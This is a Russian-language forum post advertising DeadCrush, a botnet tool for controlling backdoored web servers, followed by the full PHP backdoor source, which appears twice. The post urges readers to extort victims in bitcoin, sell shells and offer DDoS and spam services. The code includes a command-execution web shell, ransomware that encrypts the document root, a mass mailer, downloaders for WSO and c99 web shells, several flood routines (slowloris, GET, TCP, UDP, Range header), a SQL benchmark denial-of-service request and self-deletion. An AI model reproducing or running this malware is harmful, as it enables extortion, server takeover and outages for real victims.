- Статус
- offline
- Регистрация
- 24.01.2016
- Сообщения
- 369
- Репутация
- 138
В этой статье я хочу рассказать о программе DeadCrush. Прогрмма имеет консольный вид и используется для управления бэкдорами на зараженном сервере. Загрузив бэкдор на сервер вы сможете:
1) Зашифровать файлы и оставить сообщение о их расшифровки за определенную сумму
2) Узнать информацию о сервере
3)Спамить
4)Загрузить дополнительное вредононое ПО
5)Выполнять команды(фактически став владельцем этого сервера)
6)Совершать мощные DDOS атаки(slowloris, udp flood, get flood, tcp flood).
Также программа умеет сама искать уязвимые сайты по доркам, совершать поиск админ панели.
Большой плюс этой программы, что заразив сайт вам не придется постоянно его контролировать. Вы можете загрузит шелл и продать его допустим на antichat(большинство шеллов продают и покупают именно там). Предлстовлять услуги по ddos атакам. Сервера выгодней использовать, чем компютеры, имея 5-10 серверов, slowloris атакой вы сможете надолго выводить крупные сервера. Услуги по спаму. Шифровать файлы с целью вымогательства. Этот бизнес процветает уже давно, тем более если нет бэкапа файлов, то вы сможете не плохо заработать. Многие хакеры требуют выкуп в биткоинах и на вам советую.
Это 1 версия программы, в дальнейшем будет реализована автоматическая доставка бота, атаки на телефоны и улучшение системы ddos.
Для установки программы вам потребуется python 2.7 и 2 библиотеки.
python -m pip install requests
python -m pip install colorama
Вообще программа сама установит нужные вам библиотеки.
Ссылка на github: github.com/DefWolf/DeadCrush-Servers-botnet
Из аналогов существует программа shellstack. Несмотря на то, что она меньше функциональна она также может пригодиться для управления серверами.
1) Зашифровать файлы и оставить сообщение о их расшифровки за определенную сумму
2) Узнать информацию о сервере
3)Спамить
4)Загрузить дополнительное вредононое ПО
5)Выполнять команды(фактически став владельцем этого сервера)
6)Совершать мощные DDOS атаки(slowloris, udp flood, get flood, tcp flood).
Также программа умеет сама искать уязвимые сайты по доркам, совершать поиск админ панели.
Большой плюс этой программы, что заразив сайт вам не придется постоянно его контролировать. Вы можете загрузит шелл и продать его допустим на antichat(большинство шеллов продают и покупают именно там). Предлстовлять услуги по ddos атакам. Сервера выгодней использовать, чем компютеры, имея 5-10 серверов, slowloris атакой вы сможете надолго выводить крупные сервера. Услуги по спаму. Шифровать файлы с целью вымогательства. Этот бизнес процветает уже давно, тем более если нет бэкапа файлов, то вы сможете не плохо заработать. Многие хакеры требуют выкуп в биткоинах и на вам советую.
Это 1 версия программы, в дальнейшем будет реализована автоматическая доставка бота, атаки на телефоны и улучшение системы ddos.
Для установки программы вам потребуется python 2.7 и 2 библиотеки.
python -m pip install requests
python -m pip install colorama
Вообще программа сама установит нужные вам библиотеки.
Ссылка на github: github.com/DefWolf/DeadCrush-Servers-botnet
<?php if(isset($_GET['comm'])) {print(system($_GET['comm']));}
function encdir($dir, $func){
$j = 0;
$files = array_diff(scandir($dir), array('.', '..'));
foreach ($files as $filecip){
if(is_dir($dir.'\\'.$filecip)){
encdir($dir.'\\'.$filecip, $func);
}else{
$func($dir.'/'.$filecip);
}
}
}
function mcrypt($file){
if (strpos($file, '.htaccess') != false) return;
if (strpos($file, '.FS') != false) return;
$iv = mcrypt_create_iv(
mcrypt_get_iv_size(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_CBC),
MCRYPT_DEV_URANDOM
);
$key = $_GET['key'];
$encrypted = base64_encode( $iv . mcrypt_encrypt(MCRYPT_RIJNDAEL_256, hash('sha256', $key, true), file_get_contents($file), MCRYPT_MODE_CBC, $iv));
file_put_contents($file.'.FS', $encrypted);
unlink($file);
}
function z1($file){
if (strpos($file, '.htaccess') != false) return;
if (strpos($file, 'Readme.html') != false) return;
if (strpos($file, 'rans') != false) return;
$iv = mcrypt_create_iv(
mcrypt_get_iv_size(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_CBC),
MCRYPT_DEV_URANDOM
);
$key = $_GET['key'];
$dec = mcrypt_decrypt(MCRYPT_RIJNDAEL_256, hash('sha256', $key, true), file_get_contents($file), MCRYPT_MODE_CBC, $iv);
$file = substr($file, 0, -3);
file_put_contents($file, $dec);
unlink($file.'.FS');
}
if(isset($_GET['decryption'])){
encdir($_SERVER['DOCUMENT_ROOT'] , 'z1');
}
if(isset($_GET['spam'])){
$g = $_GET['count'];
for ($i=0; $i < $g; $i++) {
if(isset($_GET['to']) && isset($_GET['from']) && isset($_GET['subject']) && isset($_GET['message'])){
mail($_GET['to'],$_GET['subject'],$_GET['message'],"From:".$_GET['from']);
}
}
}
if(isset($_GET['shell'])){
if(isset($_GET['wso'])){
$f = file_get_contents('https://raw.githubusercontent.com/tennc/webshell/master/php/wso/WSO_4_0_5.php');
file_put_contents('wso.php', $f);
}
if(isset($_GET['c99'])){
$f = file_get_contents('https://raw.githubusercontent.com/tennc/webshell/master/php/PHPshell/c99shell/c99shell.php');
file_put_contents('c99.php', $f);
}
if(isset($_GET['404'])){
$f = file_get_contents('https://raw.githubusercontent.com/tennc/webshell/master/php/404.php');
file_put_contents('404.php', $f);
}
if(isset($_GET['antichat'])){
$f = file_get_contents('https://raw.githubusercontent.com/Snifer/L4bsForShell/master/PHP/Antichat Shell v1.3.txt');
file_put_contents('404.php', $f);
}
}
if(isset($_GET['encdec'])){
echo 'Key: '.$_GET['key'];
encdir($_SERVER['DOCUMENT_ROOT'] , 'mcrypt');
}
if(isset($_GET['info'])){
echo $_SERVER['SERVER_NAME'].' '.$_SERVER['SERVER_ADDR'].' '.$_SERVER['SERVER_PROTOCOL'];
}
if(isset($_GET['dos'])){
if(isset($_GET['slowloris'])){
$host = $_GET['ip'];
$time = $_GET['time'];
$mthd = $_GET['mthd'];
$timei = time();
$brow = array("", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 YaBrowser/17.6.1.749 Yowser/2.5 Safari/537.36", " Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", "Opera/9.21 (Windows NT 5.1; U; en)", "Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0");
$rand_keys = array_rand($brow, 2);
$i = 0;
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($ip, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
$out = "$mhtd / HTTP/1.1\r\n";
$out .= "Host: {$host}\r\n";
$out .= "User-Agent: ".$brow[$rand_keys[1]]."\r\n";
$out .= "Content-Length: " . rand(1, 1000) . "\r\n";
$out .= "X-a: " . rand(1, 10000) . "\r\n";
if (@fwrite($fs[$i], $out)) {
continue;
} else {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
}
}
}
if(isset($_GET['get'])){
$server = $_GET['ip'];
$time = $_GET['time'];
$timei = time();
while (time() - $timei < $time) {
$request = "GET / HTTP/1.1\r\n";
$request .= "Host: $server\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Accept: *.*\r\n";
for ($i=0; $i < 1000 ; $i++) {
$f[$i] = fsockopen($server, 80, $errno, $errstr);
fwrite($f[$i], $request);
}
}
}
if(isset($_GET['tcp'])){
$host = $_GET['ip'];
$time = $_GET['time'];
$port = 80;
$timei = time();
$max_time = 100;
while (time() - $timei < $time) {
$fp = stream_socket_client("tcp://$host:$port", $errno, $errstr, 30);
if ($fp)
{
stream_socket_sendto($fp, 'f*ck',STREAM_CLIENT_ASYNC_CONNECT);
@fclose($socket);
}
}
}
if(isset($_GET['udp'])){
$host = $_GET['ip'];
$time = $_GET['time'];
$timei = time();
$max_time = 100;
for ($i=0; $i < 6500 ; $i++) {
$out .= 'x';
}
$connect = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
while (time() - $timei < $time) {
fwrite($connect, $out);
fclose($connect);
}
}
if(isset($_GET['akill'])){
$p = "";
$host = $_GET['host'];
$port = 80;
$numforks = $_GET['num'];
for ($k=0;$k<1300;$k++) {
$p .= ",5-$k";
}
for ($k=0;$k<$numforks;$k++) {
$p = "HEAD / HTTP/1.1\r\nHost: $host\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
$fp = stream_socket_client("tcp://$host:$port", $errno, $errstr, 30);
if ($fp) { stream_socket_sendto($fp, $p, STREAM_CLIENT_ASYNC_CONNECT);
@fclose($socket);
}
}
}
if(isset($_GET['refref'])){
$host = $_GET['host'];
if( $curl = curl_init() ) {
curl_setopt($curl, CURLOPT_URL, $host." and(select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
curl_setopt($curl, CURLOPT_RETURNTRANSFER,true);
$out = curl_exec($curl);
curl_close($curl);
}
}
}
if(isset($_GET['del'])){
unlink(__FILE__);
}
?>
function encdir($dir, $func){
$j = 0;
$files = array_diff(scandir($dir), array('.', '..'));
foreach ($files as $filecip){
if(is_dir($dir.'\\'.$filecip)){
encdir($dir.'\\'.$filecip, $func);
}else{
$func($dir.'/'.$filecip);
}
}
}
function mcrypt($file){
if (strpos($file, '.htaccess') != false) return;
if (strpos($file, '.FS') != false) return;
$iv = mcrypt_create_iv(
mcrypt_get_iv_size(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_CBC),
MCRYPT_DEV_URANDOM
);
$key = $_GET['key'];
$encrypted = base64_encode( $iv . mcrypt_encrypt(MCRYPT_RIJNDAEL_256, hash('sha256', $key, true), file_get_contents($file), MCRYPT_MODE_CBC, $iv));
file_put_contents($file.'.FS', $encrypted);
unlink($file);
}
function z1($file){
if (strpos($file, '.htaccess') != false) return;
if (strpos($file, 'Readme.html') != false) return;
if (strpos($file, 'rans') != false) return;
$iv = mcrypt_create_iv(
mcrypt_get_iv_size(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_CBC),
MCRYPT_DEV_URANDOM
);
$key = $_GET['key'];
$dec = mcrypt_decrypt(MCRYPT_RIJNDAEL_256, hash('sha256', $key, true), file_get_contents($file), MCRYPT_MODE_CBC, $iv);
$file = substr($file, 0, -3);
file_put_contents($file, $dec);
unlink($file.'.FS');
}
if(isset($_GET['decryption'])){
encdir($_SERVER['DOCUMENT_ROOT'] , 'z1');
}
if(isset($_GET['spam'])){
$g = $_GET['count'];
for ($i=0; $i < $g; $i++) {
if(isset($_GET['to']) && isset($_GET['from']) && isset($_GET['subject']) && isset($_GET['message'])){
mail($_GET['to'],$_GET['subject'],$_GET['message'],"From:".$_GET['from']);
}
}
}
if(isset($_GET['shell'])){
if(isset($_GET['wso'])){
$f = file_get_contents('https://raw.githubusercontent.com/tennc/webshell/master/php/wso/WSO_4_0_5.php');
file_put_contents('wso.php', $f);
}
if(isset($_GET['c99'])){
$f = file_get_contents('https://raw.githubusercontent.com/tennc/webshell/master/php/PHPshell/c99shell/c99shell.php');
file_put_contents('c99.php', $f);
}
if(isset($_GET['404'])){
$f = file_get_contents('https://raw.githubusercontent.com/tennc/webshell/master/php/404.php');
file_put_contents('404.php', $f);
}
if(isset($_GET['antichat'])){
$f = file_get_contents('https://raw.githubusercontent.com/Snifer/L4bsForShell/master/PHP/Antichat Shell v1.3.txt');
file_put_contents('404.php', $f);
}
}
if(isset($_GET['encdec'])){
echo 'Key: '.$_GET['key'];
encdir($_SERVER['DOCUMENT_ROOT'] , 'mcrypt');
}
if(isset($_GET['info'])){
echo $_SERVER['SERVER_NAME'].' '.$_SERVER['SERVER_ADDR'].' '.$_SERVER['SERVER_PROTOCOL'];
}
if(isset($_GET['dos'])){
if(isset($_GET['slowloris'])){
$host = $_GET['ip'];
$time = $_GET['time'];
$mthd = $_GET['mthd'];
$timei = time();
$brow = array("", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 YaBrowser/17.6.1.749 Yowser/2.5 Safari/537.36", " Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", "Opera/9.21 (Windows NT 5.1; U; en)", "Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0");
$rand_keys = array_rand($brow, 2);
$i = 0;
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($ip, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
$out = "$mhtd / HTTP/1.1\r\n";
$out .= "Host: {$host}\r\n";
$out .= "User-Agent: ".$brow[$rand_keys[1]]."\r\n";
$out .= "Content-Length: " . rand(1, 1000) . "\r\n";
$out .= "X-a: " . rand(1, 10000) . "\r\n";
if (@fwrite($fs[$i], $out)) {
continue;
} else {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
}
}
}
if(isset($_GET['get'])){
$server = $_GET['ip'];
$time = $_GET['time'];
$timei = time();
while (time() - $timei < $time) {
$request = "GET / HTTP/1.1\r\n";
$request .= "Host: $server\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Accept: *.*\r\n";
for ($i=0; $i < 1000 ; $i++) {
$f[$i] = fsockopen($server, 80, $errno, $errstr);
fwrite($f[$i], $request);
}
}
}
if(isset($_GET['tcp'])){
$host = $_GET['ip'];
$time = $_GET['time'];
$port = 80;
$timei = time();
$max_time = 100;
while (time() - $timei < $time) {
$fp = stream_socket_client("tcp://$host:$port", $errno, $errstr, 30);
if ($fp)
{
stream_socket_sendto($fp, 'f*ck',STREAM_CLIENT_ASYNC_CONNECT);
@fclose($socket);
}
}
}
if(isset($_GET['udp'])){
$host = $_GET['ip'];
$time = $_GET['time'];
$timei = time();
$max_time = 100;
for ($i=0; $i < 6500 ; $i++) {
$out .= 'x';
}
$connect = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
while (time() - $timei < $time) {
fwrite($connect, $out);
fclose($connect);
}
}
if(isset($_GET['akill'])){
$p = "";
$host = $_GET['host'];
$port = 80;
$numforks = $_GET['num'];
for ($k=0;$k<1300;$k++) {
$p .= ",5-$k";
}
for ($k=0;$k<$numforks;$k++) {
$p = "HEAD / HTTP/1.1\r\nHost: $host\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
$fp = stream_socket_client("tcp://$host:$port", $errno, $errstr, 30);
if ($fp) { stream_socket_sendto($fp, $p, STREAM_CLIENT_ASYNC_CONNECT);
@fclose($socket);
}
}
}
if(isset($_GET['refref'])){
$host = $_GET['host'];
if( $curl = curl_init() ) {
curl_setopt($curl, CURLOPT_URL, $host." and(select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
curl_setopt($curl, CURLOPT_RETURNTRANSFER,true);
$out = curl_exec($curl);
curl_close($curl);
}
}
}
if(isset($_GET['del'])){
unlink(__FILE__);
}
?>